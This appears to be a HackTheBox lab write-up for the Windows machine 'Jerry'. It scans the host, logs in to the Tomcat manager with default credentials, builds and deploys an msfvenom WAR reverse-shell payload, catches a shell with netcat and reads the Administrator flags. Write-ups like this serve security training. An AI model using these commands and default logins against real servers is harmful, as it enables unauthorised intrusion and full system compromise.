Jerry is a Windows-based CTF from HackTheBox.
Initial
Attempted to browse to host, but no response.
Confirmed host is alive with ping.
<div class="wp-block-codemirror-blocks-code-block code-block">
<pre>kali@kali:~/Desktop/repos/ctf/hack-the-box/oopsie$ ping 10.10.10.95
PING 10.10.10.95 (10.10.10.95) 56(84) bytes of data.
64 bytes from 10.10.10.95: icmp_seq=1 ttl=127 time=7.04 ms
64 bytes from 10.10.10.95: icmp_seq=2 ttl=127 time=8.13 ms
64 bytes from 10.10.10.95: icmp_seq=3 ttl=127 time=7.99 ms
^C
--- 10.10.10.95 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2008ms
rtt min/avg/max/mdev = 7.037/7.720/8.130/0.486 ms</pre>
</div>
Makes approach a little narrower. Lets jump directly into scanning.
Scanning
Nmap
Couldn’t browse to host.
Perhaps there are other interesting services.
Initial nmap scan failed, as if host were down.
Ran nmap with -Pn
flag instead, worked.
kali@kali:~/Desktop/repos/ctf/hack-the-box/oopsie$ nmap $victimip -A Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 18:14 BST Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 4.00 seconds kali@kali:~/Desktop/repos/ctf/hack-the-box/oopsie$ nmap $victimip -v -Pn Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 18:14 BST Initiating Parallel DNS resolution of 1 host. at 18:14 Completed Parallel DNS resolution of 1 host. at 18:14, 0.01s elapsed Initiating Connect Scan at 18:14 Scanning 10.10.10.95 [1000 ports] Discovered open port 8080/tcp on 10.10.10.95 Completed Connect Scan at 18:14, 4.72s elapsed (1000 total ports) Nmap scan report for 10.10.10.95 Host is up (0.011s latency). Not shown: 999 filtered ports PORT STATE SERVICE 8080/tcp open http-proxy Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
After finding a single service, I further scanned to enumerate the service.
This was also obvious after browsing to the IP.
It’s a tomcat service.
kali@kali:~/Desktop/repos/ctf/hack-the-box/oopsie$ nmap -Pn -p- -T5 -sV $victimip Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 18:19 BST Nmap scan report for 10.10.10.95 Host is up (0.0098s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 69.60 seconds
Didn’t find anything more unfortunately, so looks like Tomcat is what we’re attacking today.
Attacking tomcat
Fortunately, I’ve got a little experience attacking tomcat.
In previous CTFs I’ve come across a few versions. Most require us to access the tomcat manager modules.
Lets try find the exact version of Tomcat that the system is using, and whether we can get simple access.
Browse to host
Version is show atop the page.
Apache Tomcat/7.0.88
Access manager app
Clicking around, I found the manager application.
As usual, it requests a username and password.
Whichever genius set up this installation is using default credentials.
tomcat:s3cret
Which allows us to login.
We can access both the status and the HTML directory.
http://10.10.10.95:8080/manager/status
http://10.10.10.95:8080/manager/html
We can likely access more but these links are accessible from homepage.
Find potential attack vector
I searched around for somewhere to upload a payload.
We can upload WAR files to the server via the /manager/html page.
http://10.10.10.95:8080/manager/html
See the Deploy section.
MSFVenom WAR payload
We can generate a payload with msfvenom
.
To run, we need a Java/JSP payload, in WAR file-format.
Tomcat is java-based, and runs JSP files.
kali@kali:~/Desktop/repos/ctf/hack-the-box/jerry$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=4443 -f war -o shell.war Payload size: 1084 bytes Final size of war file: 1084 bytes Saved as: shell.war
Upload payload
Now we have a payload, lets upload(deploy) it. You’ll notice after you Browse, select your payload, then Deploy. Another record is attached to application list.
The application will take on the name of the WAR file you deployed.
To access and execute the reverse shell, simply browse to the URL. In the above case, we need to browse to /shell
, as we uploaded shell.war
.
But, before we execute the shell we need to start a listener for our reverse shell.
Get shell
We’ll use netcat listening on 4443
.
After starting listener, navigate to the exploit path.
This will give use shell
kali@kali:~/Desktop/repos/ctf/hack-the-box$ nc -lvp 4443 listening on [any] 4443 ... 10.10.10.95: inverse host lookup failed: Unknown host connect to [10.10.14.13] from (UNKNOWN) [10.10.10.95] 49194 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>
Getting user & root flag
Now that we have shell we can look around for more info.
This system is pretty poor in terms of security. Tomcat must be running as Administrator, as we’re able to navigate directly to the Administrator /Desktop directory and pull the flags. The flag file gives us both the user flag and the root flag!
C:\apache-tomcat-7.0.88>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\apache-tomcat-7.0.88 06/19/2018 04:07 AM <DIR> . 06/19/2018 04:07 AM <DIR> .. 06/19/2018 04:06 AM <DIR> bin 06/19/2018 06:47 AM <DIR> conf 06/19/2018 04:06 AM <DIR> lib 05/07/2018 02:16 PM 57,896 LICENSE 10/02/2020 03:54 AM <DIR> logs 05/07/2018 02:16 PM 1,275 NOTICE 05/07/2018 02:16 PM 9,600 RELEASE-NOTES 05/07/2018 02:16 PM 17,454 RUNNING.txt 06/19/2018 04:06 AM <DIR> temp 10/02/2020 04:22 AM <DIR> webapps 06/19/2018 04:34 AM <DIR> work 4 File(s) 86,225 bytes 9 Dir(s) 27,602,944,000 bytes free C:\apache-tomcat-7.0.88>cd .. cd .. C:\>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\ 06/19/2018 04:07 AM <DIR> apache-tomcat-7.0.88 08/22/2013 06:52 PM <DIR> PerfLogs 06/19/2018 06:42 PM <DIR> Program Files 06/19/2018 06:42 PM <DIR> Program Files (x86) 06/18/2018 11:31 PM <DIR> Users 06/19/2018 06:54 PM <DIR> Windows 0 File(s) 0 bytes 6 Dir(s) 27,602,944,000 bytes free C:\>cd Users cd Users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users 06/18/2018 11:31 PM <DIR> . 06/18/2018 11:31 PM <DIR> .. 06/18/2018 11:31 PM <DIR> Administrator 08/22/2013 06:39 PM <DIR> Public 0 File(s) 0 bytes 4 Dir(s) 27,602,944,000 bytes free C:\Users>cd Administrator cd Administrator C:\Users\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users\Administrator 06/18/2018 11:31 PM <DIR> . 06/18/2018 11:31 PM <DIR> .. 06/19/2018 06:43 AM <DIR> Contacts 06/19/2018 07:09 AM <DIR> Desktop 06/19/2018 06:43 AM <DIR> Documents 06/19/2018 06:43 AM <DIR> Downloads 06/19/2018 06:43 AM <DIR> Favorites 06/19/2018 06:43 AM <DIR> Links 06/19/2018 06:43 AM <DIR> Music 06/19/2018 06:43 AM <DIR> Pictures 06/19/2018 06:43 AM <DIR> Saved Games 06/19/2018 06:43 AM <DIR> Searches 06/19/2018 06:43 AM <DIR> Videos 0 File(s) 0 bytes 13 Dir(s) 27,602,944,000 bytes free C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users\Administrator\Desktop 06/19/2018 07:09 AM <DIR> . 06/19/2018 07:09 AM <DIR> .. 06/19/2018 07:09 AM <DIR> flags 0 File(s) 0 bytes 3 Dir(s) 27,602,944,000 bytes free C:\Users\Administrator\Desktop>cd flags cd flags C:\Users\Administrator\Desktop\flags>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users\Administrator\Desktop\flags 06/19/2018 07:09 AM <DIR> . 06/19/2018 07:09 AM <DIR> .. 06/19/2018 07:11 AM 88 2 for the price of 1.txt 1 File(s) 88 bytes 2 Dir(s) 27,602,944,000 bytes free C:\Users\Administrator\Desktop\flags>type * type * user.txt [REDACTED] root.txt [REDACTED]
And there we have it. Jerry complete.